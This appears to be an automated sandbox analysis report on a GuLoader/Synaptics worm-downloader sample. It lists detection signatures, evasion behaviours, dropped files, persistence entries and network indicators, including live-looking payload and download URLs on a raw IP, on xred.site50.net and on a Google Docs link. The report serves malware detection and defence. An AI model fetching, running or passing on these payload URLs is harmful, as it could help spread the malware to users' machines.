Windows Analysis Report
SecuriteInfo.com.Variant.FakeAlert.2.24488.8627

Overview

General Information

Sample Name: SecuriteInfo.com.Variant.FakeAlert.2.24488.8627 (renamed file extension from 8627 to exe)
Analysis ID: 634939
MD5: c5bf732066ab84d1abba5b27638a5191
SHA1: 07b3b8a0e9008e459bd7ba727dd8380320dbc5ad
SHA256: a4bdfb7869d435589479e095b8d0c9c2b8f987bd3a8c961424376f18c31c650f
Tags: exe

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected GuLoader
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Drops PE files to the document folder of the user
Tries to detect virtualization through RDTSC time measurements
Adds a directory exclusion to Windows Defender
Uses dynamic DNS services
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Abnormally high CPU usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number, etc.) of a device
Contains functionality to shutdown / reboot the system
May infect USB drives
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Sample file name is different from the original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: http://xred.site50.net/syn/SSLLibrary.dll Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
Source: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1 Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
Source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1 Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\AppData\Local\Temp\RCXF979.tmp Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
Source: C:\Users\user\AppData\Local\Temp\RCXF979.tmp Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\RCXF979.tmp Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\ProgramData\Synaptics\RCXCD96.tmp Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
Source: C:\ProgramData\Synaptics\RCXCD96.tmp Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\ProgramData\Synaptics\Synaptics.exe Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
Source: C:\ProgramData\Synaptics\Synaptics.exe Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\AppData\Local\Temp\RCXDA77.tmp Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
Source: C:\Users\user\AppData\Local\Temp\RCXDA77.tmp Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\RCXDA77.tmp Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: 00000007.00000002.532970198.00000000030C0000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://2.58.149.33/ominz_QLUnxlrvVz46.bin"}
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe Virustotal: Detection: 62%
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe ReversingLabs: Detection: 58%
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe Avira: detected
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe Joe Sandbox ML: detected
Source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1 Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\Synaptics.exe Joe Sandbox ML: detected
Source: 0.2.SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 9.0.Synaptics.exe.400000.4.unpack Avira: Label: WORM/Dldr.Agent.gqrxn
Source: 9.0.Synaptics.exe.400000.4.unpack Avira: Label: W2000M/Dldr.Agent.17651006
Source: 12.2.Synaptics.exe.400000.0.unpack Avira: Label: WORM/Dldr.Agent.gqrxn
Source: 12.2.Synaptics.exe.400000.0.unpack Avira: Label: W2000M/Dldr.Agent.17651006
Source: 9.2.Synaptics.exe.400000.0.unpack Avira: Label: WORM/Dldr.Agent.gqrxn
Source: 9.2.Synaptics.exe.400000.0.unpack Avira: Label: W2000M/Dldr.Agent.17651006
Source: 6.0.uniformerede.exe.4b8e14.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.0.SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 6.2.uniformerede.exe.400000.0.unpack Avira: Label: WORM/Dldr.Agent.gqrxn
Source: 6.2.uniformerede.exe.400000.0.unpack Avira: Label: W2000M/Dldr.Agent.17651006
Source: 9.0.Synaptics.exe.400000.2.unpack Avira: Label: WORM/Dldr.Agent.gqrxn
Source: 9.0.Synaptics.exe.400000.2.unpack Avira: Label: W2000M/Dldr.Agent.17651006
Source: 0.2.SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.a07634.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 9.0.Synaptics.exe.400000.0.unpack Avira: Label: WORM/Dldr.Agent.gqrxn
Source: 9.0.Synaptics.exe.400000.0.unpack Avira: Label: W2000M/Dldr.Agent.17651006
Source: 6.2.uniformerede.exe.4b8e14.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 6.0.uniformerede.exe.400000.0.unpack Avira: Label: WORM/Dldr.Agent.gqrxn
Source: 6.0.uniformerede.exe.400000.0.unpack Avira: Label: W2000M/Dldr.Agent.17651006
Source: 12.0.Synaptics.exe.400000.0.unpack Avira: Label: WORM/Dldr.Agent.gqrxn
Source: 12.0.Synaptics.exe.400000.0.unpack Avira: Label: W2000M/Dldr.Agent.17651006
Source: 9.0.Synaptics.exe.400000.3.unpack Avira: Label: WORM/Dldr.Agent.gqrxn
Source: 9.0.Synaptics.exe.400000.3.unpack Avira: Label: W2000M/Dldr.Agent.17651006
Source: 9.0.Synaptics.exe.400000.1.unpack Avira: Label: WORM/Dldr.Agent.gqrxn
Source: 9.0.Synaptics.exe.400000.1.unpack Avira: Label: W2000M/Dldr.Agent.17651006
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknown HTTPS traffic detected: 172.217.168.14:443 -> 192.168.2.3:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.14:443 -> 192.168.2.3:49737 version: TLS 1.2
Source: C:\Users\user\Desktop\._cache_uniformerede.exe Registry value created: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\URBANITETENS
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: [autorun]
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: autorun.inf
Source: uniformerede.exe Binary or memory string: autorun.inf
Source: uniformerede.exe Binary or memory string: [autorun]
Source: uniformerede.exe, 00000006.00000000.270423175.0000000000401000.00000020.00000001.01000000.00000004.sdmp Binary or memory string: [autorun]
Source: uniformerede.exe, 00000006.00000000.270423175.0000000000401000.00000020.00000001.01000000.00000004.sdmp Binary or memory string: autorun.inf
Source: Synaptics.exe Binary or memory string: autorun.inf
Source: Synaptics.exe Binary or memory string: [autorun]
Source: Synaptics.exe, 00000009.00000000.364281736.0000000000401000.00000020.00000001.01000000.00000007.sdmp Binary or memory string: [autorun]
Source: Synaptics.exe, 00000009.00000000.364281736.0000000000401000.00000020.00000001.01000000.00000007.sdmp Binary or memory string: autorun.inf
Source: Synaptics.exe, 0000000C.00000002.316350277.0000000000401000.00000020.00000001.01000000.00000007.sdmp Binary or memory string: [autorun]
Source: Synaptics.exe, 0000000C.00000002.316350277.0000000000401000.00000020.00000001.01000000.00000007.sdmp Binary or memory string: autorun.inf
Source: uniformerede.exe.0.dr Binary or memory string: [autorun]
Source: uniformerede.exe.0.dr Binary or memory string: autorun.inf
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.dr Binary or memory string: [autorun]
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.dr Binary or memory string: autorun.inf
Source: YC9w8Aif.exe.9.dr Binary or memory string: [autorun]
Source: YC9w8Aif.exe.9.dr Binary or memory string: autorun.inf
Source: ~$cache1.9.dr Binary or memory string: [autorun]
Source: ~$cache1.9.dr Binary or memory string: autorun.inf
Source: RCXF979.tmp.9.dr Binary or memory string: [autorun]
Source: RCXF979.tmp.9.dr Binary or memory string: autorun.inf
Source: RCXCD96.tmp.6.dr Binary or memory string: [autorun]
Source: RCXCD96.tmp.6.dr Binary or memory string: autorun.inf
Source: Synaptics.exe.6.dr Binary or memory string: [autorun]
Source: Synaptics.exe.6.dr Binary or memory string: autorun.inf
Source: RCXDA77.tmp.9.dr Binary or memory string: [autorun]
Source: RCXDA77.tmp.9.dr Binary or memory string: autorun.inf
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 6_2_004099E0
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 6_2_00406018
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00409B1C FindFirstFileA,GetLastError, 6_2_00409B1C
Source: C:\Users\user\Desktop\._cache_uniformerede.exe Code function: 7_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 7_2_00405D74
Source: C:\Users\user\Desktop\._cache_uniformerede.exe Code function: 7_2_0040290B FindFirstFileW, 7_2_0040290B
Source: C:\Users\user\Desktop\._cache_uniformerede.exe Code function: 7_2_0040699E FindFirstFileW,FindClose, 7_2_0040699E
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 9_2_004099E0
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_00409B1C FindFirstFileA,GetLastError, 9_2_00409B1C
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 9_2_00406018
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 12_2_00406018
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 12_2_004099E0
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_00409B1C FindFirstFileA,GetLastError, 12_2_00409B1C

Networking

Source: Traffic Snort IDS: 2832617 ETPRO TROJAN W32.Bloat-A Checkin 192.168.2.3:49739 -> 69.42.215.252:80
Source: unknown DNS query: name: freedns.afraid.org
Source: Malware configuration extractor URLs: http://2.58.149.33/ominz_QLUnxlrvVz46.bin
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View IP Address: 69.42.215.252
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: Synaptics.exe, 00000009.00000000.353054699.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358069688.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408273761.0000000005450000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: RCXDA77.tmp.9.dr String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp, uniformerede.exe, 00000006.00000000.272489274.00000000004A5000.00000002.00000001.01000000.00000004.sdmp, uniformerede.exe, 00000006.00000003.281465224.0000000005E21000.00000004.00000800.00020000.00000000.sdmp, ._cache_uniformerede.exe, 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp, ._cache_uniformerede.exe, 00000007.00000000.280135055.000000000040A000.00000008.00000001.01000000.00000005.sdmp, uniformerede.exe.0.dr, ._cache_uniformerede.exe.6.dr, Synaptics.exe.6.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlX
Source: RCXDA77.tmp.9.dr String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
Source: RCXDA77.tmp.9.dr String found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniD0
Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
Source: RCXDA77.tmp.9.dr String found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://api.aadrm.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://api.aadrm.com/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://api.cortana.ai
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://api.diagnostics.office.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://api.office.net
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://api.onedrive.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://augloop.office.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://augloop.office.com/v2
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://cdn.entity.
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://clients.config.office.net/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://config.edge.skype.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://cortana.ai
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://cortana.ai/api
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://cr.office.com
Source: Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000003.344709238.00000000054EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://dev.cortana.ai
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://devnull.onenote.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://directory.services.
Source: Synaptics.exe, 00000009.00000000.370263622.0000000005DCD000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://docs.goog
Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/0
Source: Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/dr
Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
Source: RCXDA77.tmp.9.dr String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
Source: Synaptics.exe, 00000009.00000000.361451571.000000000868E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357737287.000000000757E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.359584810.0000000009BDE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.411248230.0000000008E1E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.352590518.0000000004F2D000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.362549509.0000000009A9E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.371349676.00000000091DE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.352795877.000000000530D000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.351426688.000000000476D000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.411631790.000000000945E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.371160417.0000000008F5E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.360559351.000000000743E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.410996975.000000000891E000.00000004.00000010.00020000.00000000.sdmp, 